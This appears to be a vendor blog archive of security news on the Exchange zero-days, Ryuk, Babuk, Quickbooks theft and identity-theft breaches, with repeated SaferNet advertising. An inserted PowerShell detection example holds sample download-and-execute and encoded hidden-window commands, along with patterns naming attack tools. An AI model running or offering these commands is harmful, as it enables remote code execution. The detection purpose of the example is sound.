CCP-Backed Hackers Target Exchange Servers With Zero-Day Exploit


Hackers backed by the Chinese Communist Party have exploited zero-day vulnerabilities in Microsoft Exchange to gain access to and spy on victims' systems, Microsoft researchers say. On Tuesday, the company reported four zero-day vulnerabilities in on-premises Exchange Server that were being actively exploited. Once inside, the attackers gained access to email accounts and installed additional malware to maintain long-term access to the victims' environments. Microsoft is urging customers to install the updates that patch the vulnerabilities without delay.

In its report, Microsoft's researchers identify the attackers as Hafnium, a group that operates out of China and is believed to be sponsored by the Chinese government.

It is clear from the attack that the hackers are highly skilled: finding and chaining the vulnerabilities required deep research into Exchange's internals, and using them reliably took considerable sophistication.

The intended targets are not believed to be individual Exchange users but organizations running their own Exchange servers.

Zero-day vulnerabilities, flaws that attackers exploit before the vendor has a fix available, turn up in all kinds of software, though the ones that make headlines most often affect widely deployed products such as operating systems and their major updates.

When a new product or update ships, it can carry a weakness in its code that attackers can exploit until it is found and fixed.

Finding these vulnerabilities is hard. It often means reverse-engineering release or beta builds, and it demands a strong understanding of both the language the software is written in and of exploitation techniques.

In the white-hat community, researchers often take part in bug bounty programs run by companies such as Microsoft and Google. The researcher finds a previously unknown vulnerability and reports it only to the company affected, which rewards the researcher with a bounty that can be as much as $100,000.

In the black-hat community, finding the vulnerability is the same work, but the outcome is different. Freelance hackers may sell knowledge of an exploit on the Dark Web for hundreds of thousands of dollars, though they often belong to a larger group that uses the exploit itself.

Anatomy of the Exploits



Often when vulnerabilities are found in a release, Microsoft gives customers some time to roll the fix out through their normal update cycle. Given the severity of these four, however, it has advised patching immediately. The four vulnerabilities are CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065.

CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that allowed the attacker to send arbitrary HTTP requests and authenticate as the Exchange server. It is the entry point of the chain: it needs no credentials, and it supplies the authentication that the other three bugs require.

CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization occurs when a program deserializes untrusted, user-controllable data, letting the attacker choose which objects get constructed. Exploiting it gave Hafnium the ability to run code as SYSTEM on the Exchange server. On its own it requires administrator permission or another vulnerability to exploit.

CVE-2021-26858 is a post-authentication arbitrary file write vulnerability in Exchange. Once Hafnium could authenticate to the Exchange server, they could use it to write a file to any path on the server, which is how the additional malware used for long-term access was dropped. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin's credentials.

CVE-2021-27065 is a second post-authentication arbitrary file write vulnerability in Exchange with the same precondition and the same effect: an authenticated attacker, whether through the SSRF or stolen admin credentials, can write a file to any path on the server.
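As an added example (this is not code from the article or from Microsoft), the PowerShell below hunts for the kind of artifact the two arbitrary file write flaws leave behind: a web-facing .aspx, .ashx or .asmx file that appeared or changed recently under the directories Exchange serves through IIS. It assumes it is run elevated on the Exchange server, that $env:ExchangeInstallPath is set (it is on a standard install), and the directory list and the 14-day window are this example's own choices.

```powershell
# Added example, not Microsoft's code: list recently created or changed
# script files in the Exchange web directories IIS serves.  Assumes an
# elevated session on the Exchange server and that $env:ExchangeInstallPath
# is set; the directory list and the default window are assumptions.
param(
    [int]$DaysBack = 14
)

$root = $env:ExchangeInstallPath
if (-not $root) {
    throw 'ExchangeInstallPath is not set; run this on the Exchange server itself.'
}

# Web-facing directories.  Files that ship with Exchange live here too, so
# the filter below is on recency, not on mere presence.
$webDirs = @(
    (Join-Path $root 'FrontEnd\HttpProxy\owa\auth'),
    (Join-Path $root 'FrontEnd\HttpProxy\ecp\auth'),
    (Join-Path $env:SystemDrive 'inetpub\wwwroot\aspnet_client')
)

$cutoff = (Get-Date).AddDays(-$DaysBack)

$hits = foreach ($dir in $webDirs) {
    if (-not (Test-Path -Path $dir)) { continue }
    Get-ChildItem -Path $dir -Recurse -File -Include '*.aspx', '*.ashx', '*.asmx' -ErrorAction SilentlyContinue |
        Where-Object { $_.CreationTime -gt $cutoff -or $_.LastWriteTime -gt $cutoff } |
        ForEach-Object {
            # Hash every hit so it can be compared against known-good copies
            # or shared with responders without moving the file.
            [pscustomobject]@{
                Path          = $_.FullName
                CreationTime  = $_.CreationTime
                LastWriteTime = $_.LastWriteTime
                SizeBytes     = $_.Length
                SHA256        = (Get-FileHash -Path $_.FullName -Algorithm SHA256).Hash
            }
        }
}

if ($hits) {
    $hits | Sort-Object -Property CreationTime -Descending | Format-Table -AutoSize
} else {
    "No .aspx/.ashx/.asmx files newer than $DaysBack days under the checked directories."
}
```

Anything it lists that nobody deployed should be copied off and analysed rather than simply deleted, and the server treated as compromised until proven otherwise. This is a narrow check: it does not confirm patch status (compare the server's build against Microsoft's advisory for that), and Microsoft's Exchange team has since published far more thorough hunting scripts (Test-ProxyLogon.ps1 in its CSS-Exchange repository); this block only shows the shape of the check.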

Hafnium: The Hackers Behind The Attacks



The group behind the attack, Hafnium, is believed to be backed by the Chinese government. Unlike groups such as Lazarus, Hafnium has kept a very low profile and appears to put more effort into hiding its tracks than other groups do.

Microsoft claims, “Hafnium primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.”

Hafnium has a history of exploiting zero-day vulnerabilities in internet-facing servers. Once inside a network, it usually exfiltrates data to file-sharing sites such as MEGA.

Microsoft had been tracking Hafnium for a number of months, after earlier attempts by the group against Exchange servers. There have also been several past cases of Hafnium targeting Office 365 users.

Protection Against Hackers

There are many steps you can take to keep your business and family safe from attacks like this. Applying the patches Microsoft has released is the first; using the right tools to stay protected is another.

One of these tools is SaferNet.

SaferNet is the perfect solution to the cybersecurity issues that individuals, families, and businesses face today. It not only connects every device using a secure, 24/7 always-on, military-grade VPN, but it also stops outside cyberthreats, malware and viruses as well. On SaferNet, all users are protected anywhere in the world, all the time, on any cellular or Wi-Fi network. In addition to SaferNet's VPN and cyber protection, it also offers a range of employee or parental/family internet controls including internet filtering, monitoring, scheduling, and blocking access to websites or even entire website categories.

Typically, a business or family would need 3 separate services for a VPN, Malware Protection, and Internet Controls; SaferNet offers all 3 features in one service. SaferNet truly is an endpoint security presence that can be implemented in minutes around the world, on phones, laptops, tablets, and computers at an economical price point that caters to all sizes of businesses and families. SaferNet guarantees a smooth setup and installation process that takes only minutes, and an easily accessible control hub for you to monitor all your employees' or family members' devices, including activity, time spent online, and threats blocked.

Universal Health Services Report $67 Million Loss To Ryuk Ransomware

Ransomware damage can eat a huge chunk of a company's yearly expenditure, and the figure is often alarming. That is the case for Universal Health Services (UHS), which has revealed that it was the victim of a large ransomware attack in September 2020. The attack used the infamous Ryuk ransomware and cost the company $67 million.

UHS is a major healthcare provider, a Fortune 500 hospital operator serving about 3.5 million patients in over 400 facilities across the US and the UK.

Service delays since September had prompted speculation that a cyberattack had taken place. UHS had previously declined to comment, but disclosed the breach and its cost in the company's earnings report on February 25th.

When its systems were infected, UHS quickly disconnected internal servers from the network to halt the spread of the ransomware. It then gradually restored patient data from backups onto new servers, which led to a notable slowdown in its services.

“The substantial majority of the unfavorable impact was attributable to our acute care services and consisted primarily of lost operating income resulting from the related decrease in patient activity as well as increased revenue reserves recorded in connection with the associated billing delays,” UHS stated.

“Also included were certain labor expenses, professional fees and other operating expenses incurred as a direct result of this incident and the related disruption to our operations.”

“We also incurred significant incremental labor expense, both internal and external, to restore information technology operations as expeditiously as possible.”

UHS went on to state that patient data was safely recovered from the affected systems.

Ryuk's Ransomware Campaign


We have covered Ryuk in a previous article, and its campaign continues, aimed mostly at hospitals and other healthcare providers.

Ryuk is a highly sophisticated piece of malware. Several groups have been suspected of being behind it, ranging from Lazarus Group to criminal groups based in Russia.

Besides its technical complexity, Ryuk is also notable for demanding much higher ransoms than its predecessors. So far it has hit many businesses and organizations worldwide, and has been very profitable for the hackers behind it.

Ryuk is usually deployed via trojans like Emotet. Unlike many of its peers, Ryuk does not strike immediately; it can take days and sometimes weeks to become apparent to the user. During this seemingly dormant period, its operators make several changes to the victim's Windows systems to make sure the eventual encryption succeeds.

One of these steps is to delete Volume Shadow Copies and disable Windows System Restore, guaranteeing that IT teams cannot roll machines back to a previous, clean state. Ryuk also uses the host's network to reach and infect other devices. In a hospital or corporation, that means entire buildings can be infected in a short space of time.

The team at UHS were likely aware of Ryuk's capabilities and had recent backups. While they have not detailed much of their response for security reasons, it appears they acted quickly to isolate systems and move data before Ryuk could take full control.

Hospitals As Targets For Ransomware


Ryuk stepped up its campaign against hospitals last year, hitting roughly 20 healthcare-affiliated organizations every week during the third quarter of 2020. It is not the only ransomware strain targeting hospitals.

Hospitals make the ideal ransomware target. They hold massive amounts of sensitive patient information, which sells easily on the Dark Web if stolen, and they usually run on interconnected networks that let ransomware propagate quickly. Add the financial resources behind healthcare, and the whole industry has a digital bullseye on its back.

The pandemic added fuel to the fire: as more hospitals moved services online, additional attack vectors opened up for hackers.

A 71% increase in attacks against hospitals last year prompted the FBI to issue a warning.

Protection Against Ransomware

Healthcare isn't the only target for ransomware; the majority of ransomware cases involve smaller businesses and family homes.

As attacks ramp up, it’s important to use the tools out there to protect your business and your family online. One of these tools is SaferNet.



New Ransomware for 2021 Babuk Hits Several Industries

Ransomware has proved to be one of the key malware threats of 2021, and the year is only three months old. Veterans like Ryuk are still spreading widely, and newer arrivals like 2019's Cuba are making headlines. Among the well-known faces is a newcomer, Babuk, which was discovered in January of this year and has hit five major industries: transportation, healthcare, plastics, electronics, and agriculture.

Of the attacks carried out so far, just one target has paid the ransom, $85,000; the target in question was Serco.

For those who have not paid, the data is already for sale on the Dark Web.

Babuk uses several attack vectors seen in other ransomware. Primarily, it relies on spear phishing: the group behind Babuk obtains the email addresses of a company's managers and executives and writes to them posing as a supplier, distributor, or other trusted party. The emails carry an attachment containing a popular trojan loader; in two cases, Emotet and TrickBot were reported. Once the attachment is opened and the trojan executes, Babuk is deployed on the target machine.

Babuk has also broken into systems by using exploits. Few people follow security news more closely than attackers, who routinely watch for newly disclosed flaws in servers and databases, particularly on Windows systems. Exploits like these mean there is no need to 'hack' into the system as such, only to walk through a door that has been left open. One Babuk infection has been traced back to an exploit against Remote Desktop access.

Lastly, Babuk has gained entry by buying credentials on the Dark Web, where corporate accounts, company information, and email addresses are all for sale. Researchers at McAfee say several Babuk breaches resulted from stolen credentials like these.

Unsophisticated Ransomware


Despite the damage Babuk is causing, researchers at McAfee have noted that the ransomware is fairly unsophisticated compared to more complex malware like Ryuk.

Babuk uses the ChaCha8 stream cipher to encrypt files and Elliptic-curve Diffie-Hellman for key generation, so each victim's file key is derived from a secret only the attackers hold. That certainly makes recovering the files without paying difficult, but this level of encryption is standard for modern ransomware rather than a mark of sophistication.

Though seemingly independent, Babuk shares core functionality with Ransomware-as-a-Service (RaaS) products. Research suggests the gang behind Babuk bought a RaaS kit, reverse-engineered it, and has since been making it their own.

Babuk also contains a number of noticeable bugs, and lacks the obfuscation a large-scale ransomware campaign requires. The researchers state that the group behind the attacks has 'limited ransomware coding experience.'

Finally, Babuk contains no local-language checks. Ransomware often checks the device's language before deploying and, as a general rule of thumb, will not run if the language is Russian or another Eastern European language.

Recruitment in the RaaS World

Ransom Letter Left by Babuk

As mentioned, the Babuk group appear to be reverse-engineering a RaaS kit in order to make it their own.

Attempts at this so far have certainly led to monetary gain, but as the researchers pointed out, the Ransomware itself is not very complex.

The group seems aware of its limitations and has begun recruiting on the Dark Web.

Specifically, the Babuk group has begun hiring individuals skilled in 'winPEAS, Bloodhound, SharpHound, CobaltStrike, and Metasploit'. That tool list points to penetration testers, who will likely be tasked with improving Babuk's ability to break into a network and move through it.

Because of this, McAfee notes that administrators should be on the lookout for suspicious use of legitimate tools, PowerShell in particular.
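As an added example tied to that advice (it is not from the McAfee report or from this article), the PowerShell below scores script-block text against a small rule set covering the tools named above and the download-and-run patterns they are usually delivered with. It assumes PowerShell Script Block Logging is turned on, so that event ID 4104 in the Microsoft-Windows-PowerShell/Operational log carries the script text; the rule list and the sample blocks at the bottom are constructed for the example and are not real telemetry.

```powershell
# Added example, not McAfee's code: rule-based triage of PowerShell script
# block text.  Assumes Script Block Logging is enabled so event 4104 carries
# the script text; the rules and the samples below are this example's own.

$suspicious = @(
    @{ Name = 'BloodHound/SharpHound'; Pattern = 'Invoke-BloodHound|SharpHound' }
    @{ Name = 'winPEAS';               Pattern = 'winPEAS' }
    @{ Name = 'Shellcode loader';      Pattern = 'VirtualAlloc|CreateThread|DllImport' }
    @{ Name = 'Download cradle';       Pattern = 'DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod|\biwr\b' }
    @{ Name = 'In-memory execution';   Pattern = '\bIEX\b|Invoke-Expression' }
    @{ Name = 'Encoded command';       Pattern = '-(e|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{40,}' }
    @{ Name = 'AMSI/logging tamper';   Pattern = 'AmsiUtils|amsiInitFailed|ScriptBlockLogging' }
)

# Return the name of every rule a script block trips; nothing for a clean one.
# -match is case-insensitive by default, which is what we want here.
function Test-ScriptBlock {
    param([string]$Text)
    foreach ($rule in $suspicious) {
        if ($Text -match $rule.Pattern) { $rule.Name }
    }
}

# Live query: pull 4104 events from the local log.  For that event ID,
# Properties[2] is the ScriptBlockText field.
function Get-SuspiciousScriptBlocks {
    param([int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents $MaxEvents |
        ForEach-Object {
            $text = [string]$_.Properties[2].Value
            $hits = @(Test-ScriptBlock -Text $text)
            if ($hits.Count -gt 0) {
                [pscustomobject]@{
                    Time   = $_.TimeCreated
                    Rules  = $hits -join ', '
                    Sample = $text.Substring(0, [Math]::Min(120, $text.Length))
                }
            }
        }
}

# Constructed sample blocks (not real telemetry) so the rules can be exercised
# on a machine with no 4104 events; the base64 tail is arbitrary padding.
$samples = @(
    'Get-Service -Name Spooler | Restart-Service',
    'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a.ps1")',
    'Import-Module .\SharpHound.ps1; Invoke-BloodHound -CollectionMethod All',
    'powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA'
)
foreach ($s in $samples) {
    $hits = @(Test-ScriptBlock -Text $s)
    $verdict = if ($hits.Count -gt 0) { $hits -join ', ' } else { 'clean' }
    '{0,-50} => {1}' -f $s.Substring(0, [Math]::Min(48, $s.Length)), $verdict
}
```

Run Get-SuspiciousScriptBlocks on a host to triage its real log; the sample loop at the end runs without any events at all. The rules are deliberately loose: DownloadString, DllImport and IEX also turn up in legitimate admin scripts, so treat a hit as something to look at rather than a verdict, and tune the list to what your own fleet actually runs.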

Protection Against Ransomware

As the criminals gear up their recruitment, SMBs and individuals should be gearing up their own defences against ransomware like Babuk.

One of these tools is SaferNet.


Quickbooks users under attack as tax season heralds data-theft surge

Quickbooks, the popular accounting package, is under attack from several hacking groups using a variety of attack vectors, one of which takes advantage of a security design flaw in Quickbooks itself. Tax season is always a busy one for cybercriminals, and with Quickbooks established as the go-to accounting platform for SMBs, their choice of target was an obvious one.

The campaign is centered on spear phishing. Targets are not selected at random; the attackers research specific companies, largely on sites like LinkedIn, where individuals' email addresses may be displayed. Those addresses are added to a larger target database for the attackers to use.

Researchers at ThreatLocker encountered the campaign this week and identified three main attack vectors.

In the first vector, the hackers send an email with a PowerShell command embedded in it, which runs on the recipient's machine. The second is more familiar: an email containing a Microsoft Office document whose macro executes once the document is opened. Both vectors run a similar piece of malware that is just 15 lines of code.

When either vector succeeds, the malware locates the most recently saved Quickbooks files, whether on a file share or in a local directory, and uploads them to the hackers' servers.

The third vector differs from the others in that it does not require the user to run any malware; instead, the hackers take advantage of a security design flaw in Quickbooks. The attacker runs Invoke-WebRequest, which exploits weak access permissions on the Quickbooks database to pull out its contents. Invoke-WebRequest is simply a PowerShell command that fetches content from a web page or server.

ThreatLocker tracked much of the stolen data to the Dark Web, where it is being sold as a commodity. Researchers found data on sale for as little as $100 for 100 corporate databases, with the price rising into the thousands for a clean database with full financial information.

What is done with the sold data could take several forms. The attack is still ongoing, so its full extent likely will not be known until later this year.

One use that has already surfaced is a classic social engineering scam. Once a hacker has gathered enough information about a company and its invoices from its Quickbooks database, they use it in further spear-phishing campaigns. Cases already reported include emailing a customer while posing as a supplier and requesting that a payment be sent to a new bank account, and emailing from an address that appears to belong to a known supplier, partner, or customer to request a bank transfer.

Quickbooks Security Design Flaws

Quickbooks is no newcomer to the accounting software scene; it has been available for decades. Recent releases, notably Quickbooks 2019 and Quickbooks 2020, emphasized user-requested features, extending the platform's lead over its competitors.

Early versions of Quickbooks, going back to the 1992 launch, were thought to have poor security standards. While security has been improved since then, these recent reports suggest some less-than-secure practices remain.

This is apparent in the success of a plain Invoke-WebRequest against Quickbooks file servers.

When Quickbooks company files are kept on a file server, the user is required to use Quickbooks Database Server Manager. If a repair is carried out, all file permissions are hard-reset and the 'Everyone' group is added to them. This is frankly disastrous: the database is left wide open, and anybody who can reach the share can read it.

This approach requires little technical insight from the hacker; Invoke-WebRequest is one of the most basic PowerShell commands.

In its report, ThreatLocker recommends routinely checking your file permissions to make sure access is not granted to 'Everyone', and doing so particularly after carrying out any repair. Where the organization's structure allows, permissions should be restricted to a single user.
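As an added example of that check (not ThreatLocker's or Intuit's code), the PowerShell below walks the folder holding the company files and reports every Allow entry granted to Everyone, matching on the well-known SID S-1-1-0 rather than the display name so it works regardless of the system's UI language; with -Fix it strips the explicit entries it finds. The path is a placeholder, and it assumes it is run by an account that can read, and for -Fix modify, the ACLs.

```powershell
# Added example, not ThreatLocker's or Intuit's code: find (and optionally
# remove) Allow entries for Everyone on the folder that holds the Quickbooks
# company files.  The path is a placeholder; run as an account that can read
# the ACLs, and change them if -Fix is used.
param(
    [string]$Path = 'D:\QuickBooksData',
    [switch]$Fix
)

# Well-known SID for Everyone, so the match does not depend on the display
# name ("Everyone", "Jeder", ...) a given system returns.
$everyoneSid = [System.Security.Principal.SecurityIdentifier]'S-1-1-0'

# Resolve an ACE's identity to a SID; $null if it cannot be resolved
# (for example an orphaned account).
function Get-AceSid {
    param([System.Security.AccessControl.FileSystemAccessRule]$Ace)
    try { $Ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]) }
    catch { $null }
}

if (-not (Test-Path -LiteralPath $Path)) {
    throw "Path not found: $Path"
}

# Root first, then everything under it, so an explicit entry on the parent is
# removed before its inherited copies on the children are examined.
$items = @(Get-Item -LiteralPath $Path) + @(Get-ChildItem -LiteralPath $Path -Recurse -ErrorAction SilentlyContinue)

foreach ($item in $items) {
    $acl = Get-Acl -LiteralPath $item.FullName
    $everyoneAces = @($acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and (Get-AceSid -Ace $_) -eq $everyoneSid
    })

    foreach ($ace in $everyoneAces) {
        if ($Fix -and -not $ace.IsInherited) {
            $action = 'removed'
        } elseif ($Fix) {
            $action = 'inherited, fix at parent'
        } else {
            $action = 'reported'
        }

        [pscustomobject]@{
            Path      = $item.FullName
            Rights    = $ace.FileSystemRights
            Inherited = $ace.IsInherited
            Action    = $action
        }

        if ($Fix -and -not $ace.IsInherited) {
            # Explicit entry: strip it and write the ACL back.
            [void]$acl.RemoveAccessRule($ace)
            Set-Acl -LiteralPath $item.FullName -AclObject $acl
        }
    }
}
```

Run it without -Fix first and read the list. Inherited entries are reported but only removed where they are defined, at the parent, which the script reaches first because it starts at the root folder. NTFS permissions are only half the picture: if the folder is shared, check the share permissions as well (Get-SmbShareAccess on Windows Server). After cleaning up, confirm that the account the Quickbooks Database Server Manager service runs as and your Quickbooks users still have the access they need, and re-run the audit after any repair, since that is when the Everyone entry comes back.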


Phishing Attacks on SMBs




The recent attacks on Quickbooks and the weaknesses in its design are just one more addition to the long list of cybersecurity threats SMBs face today.

Email is without a doubt the biggest risk to address when tightening security at an SMB. That concern has always existed, but it rose sharply with the COVID-19 pandemic, which restructured the classic office as employees began working from home.

This led to greater dependence on email for communication and on other cloud platforms for work, some of which were rushed out so that they would be available to companies during this time; that haste, in turn, introduced security vulnerabilities.

The pandemic became open season for cybercriminals, who have found new and better ways to exploit the communication channels put in place so that employees can work as normal.

Smaller businesses, in particular, are at risk, as they lack the resources to keep up with emerging threats.

Last year, 91% of all successful cyberattacks against SMBs began with a phishing email, and 55% of SMBs said they had been the victim of a phishing attack.

According to the National Small Business Association, small businesses absorb over $20K in costs per attack, with SMBs spending nearly $900K to clean up after an actual data breach.


Protection Against Phishing And Other Attacks


If one thing is clear, it's that small businesses are big targets.

Phishing is ultimately a threat that education can greatly reduce. Making employees aware of email threats, and of how to spot them, goes a very long way toward protecting a business of any size.

Few people can spot every fraudulent email, though, and it's wise to have the necessary tools in place to back up employees where intuition falls short.

One of these tools is SaferNet, which was designed with SMBs in-mind.



Hospitals Return To Paper Systems as Ransomware Takes Hold on Health Service

Ransomware has gripped the health service in France, where two hospitals have reverted to paper systems to keep working while the infection holds. The hospitals at Dax and Villefranche-sur-Saône were forced to cut off the internet and other networks to stop the ransomware from spreading. The attackers also took down the hospitals' telephone systems.

The attacks are part of a wider ransomware campaign against France's health service. Though it is still early in the year, several French hospitals have been hit with ransomware, prompting a general warning from the Health Minister, and a few days ago President Macron pledged €1bn to combat the country's cybersecurity problems.

The National Information Systems Security Agency (ANSSI) has been working to repair the systems at Dax and Villefranche-sur-Saône, though full restoration is expected to take weeks.

Ransomware has targeted the health industry for many years, but most people only became aware of it during the WannaCry attacks of 2017, which crippled the National Health Service in the United Kingdom.

The chief goal of ransomware is always to make money for the hackers. Ideally for them, the target pays the ransom up front and gets its files decrypted.

If the target does not pay the ransom, the hackers fall back on the copy of the data they pulled out of the network before encrypting it, typically through the same backdoor they used to deploy the ransomware. That data is then sold on the Dark Web or published.

Medical records are the bread and butter of stolen data sold on the dark web. They usually contain personally identifiable information (PII), enough to identify an individual and, in many cases, to commit identity theft in their name. That gives medical records measurable value on the dark web, as using them for fraud can be lucrative.

CybelAngel, a digital threat research firm, has been studying the ransomware attacks on French hospitals and has identified medical records from them being sold on the dark web. Neither Dax nor Villefranche-sur-Saône paid the ransom, so their data is on sale; CybelAngel reports that as many as 500,000 records from the attacks are currently on the Dark Web.

Ransomware Attack Vector


Although the hackers' identity is unknown, some details are known about the attack vector and the nature of the attacks on Dax and Villefranche-sur-Saône.

The ransomware is believed to have been deployed via a remote access service, using login details possibly harvested through phishing; the attack was planned well in advance.

As for the ransomware itself, it has been confirmed that Ryuk was used.

Ryuk is one of the more sophisticated ransomware families. It is usually deployed via a trojan, though several other delivery methods have been reported.

Ryuk can lie dormant on a machine for potentially weeks before being activated. It is most commonly seen in large, multi-network organizations such as hospitals, because it uses the network to propagate after infecting a single device, which makes a hospital an ideal target for a group using Ryuk.

Ryuk has been linked with high-profile hacking organizations such as Lazarus Group in the past.

Other Ransomware Attacks in France


The last 12 months have seen a sharp increase in ransomware attacks in France, up 255% since 2019.

The attacks have hit several sectors, including education and digital service providers, although the hardest hit has been the healthcare system.

France is not alone in this; nearly every country has reported a staggering number of ransomware attacks in the last year.

The larger context for these attacks is the COVID-19 pandemic. Changes in how hospitals operate and how they handle patients have meant scaling up systems or switching to new ones entirely.

At times like these, with sensitive medical records being moved from system to system, ransomware often finds a place to flourish.

Among the other targets hit in this new wave of attacks in France is Mutuelle Nationale des Hospitaliers (MNH). MNH is a health insurer serving public and private medical professionals. It was hit with ransomware in early February and was forced to cease all operations during the attack.

MNH was hit by the RansomExx group, which uses a variant of the Defray777 ransomware family. The group has previously targeted the Texas Department of Transportation, Brazilian government networks, IPG Photonics, Tyler Technologies, and Konica Minolta. It is unknown whether this group was also behind the attack on the hospitals at Dax and Villefranche-sur-Saône.

What You Can Do About Ransomware

A common mistake is believing that all ransomware attacks are large-scale assaults on industry that do not touch homes or small and medium businesses. In reality, the majority of ransomware targets these smaller entities. While less lucrative for the hackers, smaller targets mean government or federal authorities are less likely to intervene, and so the victim is more likely to pay.

We are seeing a renaissance across the board for all forms of malware, fueled by a work-from-home society and an increasingly connected community.

In times like these, it is important to have the right tools to ensure you or your business don’t fall victim. SaferNet was built as one of these tools.



5 Data Breaches That Caused Identity Theft

Identity theft can be absolutely devastating for an individual. With most malware, we know what can be harmed: our devices may need to be replaced, we may lose access to accounts for a few days or even forever, we may even need to pay a ransom to get our data back. The point is that after most types of malware we can eventually rebuild, even if it takes longer than we expect. The fallout from identity theft lasts much longer.

A single fraudulent use of your stolen information can take anywhere from a few days to six months to resolve. But the information itself stays in circulation for a very long time, so you may find yourself dealing with fresh incidents of identity theft for many years, even decades.

Identity Theft has been around for a very long time and predates our modern technology by thousands of years. There have always been individuals that try to impersonate others for their own gain, financial or otherwise. However, the internet’s birth and wide adoption have led to new attack vectors, dwarfing any possible past attempts.

Now more than ever, data is tied to our personal identity. Email addresses, bank account numbers, phone numbers, Social Security numbers, home addresses: all of these and more form a picture of us as rows in a database.

And when this information falls into the wrong hands, it can do a lot of damage. Bank accounts can be drained, and your credit rating can get rattled; you can end up with medical bills or even a criminal record. The list of potential mishaps that can arise from identity theft is endless.

To criminals, identity theft is a lucrative stream of income, and they can easily cover their tracks. Once they have seized personal information, they sell it on the dark web. The same records can be sold repeatedly over time, so even after you notice that your identity has been stolen and misused once, it can be used again in several separate incidents over a period of years.

The US government publishes guidelines for discovering whether you are a victim of identity theft when it is not immediately obvious:

  • You stop receiving your regular bills and credit card statements.
  • You receive statements for accounts you never opened.
  • Debt collectors start calling you day and night about debts you’ve never heard of.
  • The IRS alleges you failed to report income for a company you never worked for.
  • You see withdrawals/charges on your bank or credit card statement that you didn’t make.
  • You try to file your taxes only to discover that someone else beat you to it.
  • You try to file your taxes and find someone claimed your child as a dependent already.
  • Your credit report includes lines of credit you never opened.
  • Your credit score fluctuates wildly and for no apparent reason.
  • The most obvious sign—you receive a notification that you’ve been the victim of a data breach.

If you are unsure, it is always best to check with the authorities via the US government’s identity theft website, IdentityTheft.gov.

There are two primary attack vectors when it comes to identity theft online.

The first is a personal cyberattack that compromises your data on your own devices, usually without your knowledge. It often relies on the user falling for a phishing scam or having inadequate security protection. This is covered in more detail later.

The other attack vector is through data breaches. These are sophisticated large-scale attacks, often on banks and hospitals. When an attacker breaches one of these institutions, they make off with thousands and often millions of records, which are quickly put up for sale on the dark web. Today, let’s look at 5 data breaches that caused identity theft on a large

Data Breaches That Caused Identity Theft #5: Yahoo!

yahoo data breach

The Yahoo! data breach doesn’t seem like an obvious choice: Yahoo! is not a bank or hospital and does not store as much in-depth information about its users. However, the sheer scale of the breach meant that enough information was sold to enable identity theft.

To date, the Yahoo! breach is the largest on record and will likely remain so for a very long time. While often referred to as one breach, the incident in fact covers two separate intrusions, in 2013 and 2014, that were not disclosed until 2016. It was only in 2017 that the true scale of the damage was revealed.

In 2016, journalists from Wired and Vice’s Motherboard secured an interview with an individual known online as Peace_of_Mind, or simply Peace. Peace had operated on a dark web marketplace known as TheRealDeal, a site long known to authorities as a hub of the cyber-arms trade that sold exploits, malware-as-a-service, and personal data records for millions of people.

By the time of the interview the site had been shut down and Peace was mostly retired. He told the journalists that he acted as a broker: hackers sold data to him, and he resold it to the masses. In the article, Peace named Yahoo! as one of the main sources of the data he sold.

Only after the article was published did Yahoo! respond, stating that it was aware of breaches. It first disclosed that 500 million accounts had been affected (the 2014 intrusion), then that about a billion accounts had been compromised in a separate 2013 intrusion. Finally, in 2017, Yahoo! confirmed that all 3 billion of its accounts had been affected by the 2013 breach.

While Peace never revealed who sold him the data, the hackers were eventually identified. The four men charged were Alexsey Belan, a hacker on the FBI’s Cyber’s Most Wanted list; FSB officers Dmitry Dokuchaev and Igor Sushchin, who the FBI accused of paying Belan and other hackers to carry out the intrusion; and Canadian hacker Karim Baratov, who the FBI said was paid by Dokuchaev and Sushchin to use data from the Yahoo! breaches to break into about 80 non-Yahoo! accounts of specific targets.

The breach had a huge fallout, especially in the court cases against Yahoo!, many of which are still ongoing. Because it did not tell its users about the breaches for years, Yahoo! faced harsh criticism. Under a class-action settlement first proposed in 2018, anyone who could document that they were a victim of identity theft following the attack could claim money from the settlement fund.

Data Breaches That Caused Identity Theft #4: JP Morgan Chase

JP Morgan Chase Cyberattack

In 2014, the JP Morgan Chase cyberattack and data breach was considered one of the most serious penetrations of America’s financial infrastructure to date.

Four men, two Israelis, an American, and a Russian hacker who did the technical work, ran a campaign against JP Morgan Chase to gain access to customer records across Chase’s systems; the intrusion reportedly began with stolen employee credentials on a server that had not been enrolled in two-factor authentication. In total, they got the details of 83 million accounts, covering 76 million households and about 7 million small businesses across the US.

Luckily, much of the data stolen was not fully revealing. It did not include Social Security numbers, passwords or account numbers, but did include names, addresses, email addresses, and phone numbers.

JP Morgan Chase and the authorities acted against the breach, and the stolen data does not appear to have been sold online at any scale. The four men involved have since been arrested and prosecuted.

While, thankfully, this breach did not cause identity theft on a massive scale, it set a precedent: banks could be breached, the data could be taken, and if the attackers covered their tracks well enough, they would have time to sell it.

Following the attack, JP Morgan Chase pledged a $150 Million cybersecurity budget per year and has given free credit monitoring to all involved in the breach to combat future instances of identity theft.

Data Breaches That Caused Identity Theft #3: Marriott Hotels

Marriott Hotels Hack

The Marriott Hotels breach was particularly harmful and long-lasting.

In 2016, Marriott purchased Starwood Hotels and Resorts. Unknown to both companies, attackers had been inside the Starwood guest reservation database since 2014, using a remote-access trojan (RAT) and credential-harvesting tools to maintain access and monitor it.

In September 2018, an internal security tool flagged an unusual query against Starwood’s database, made under an account with administrator-level privileges. The investigation found that the account’s legitimate owner had not issued those queries: someone else was controlling the account.

Database forensics revealed just how long the breach had lasted: by that point, four years. It also revealed the scale. Records for up to 500 million guests were initially thought to have been stolen, a figure Marriott later revised to roughly 383 million.

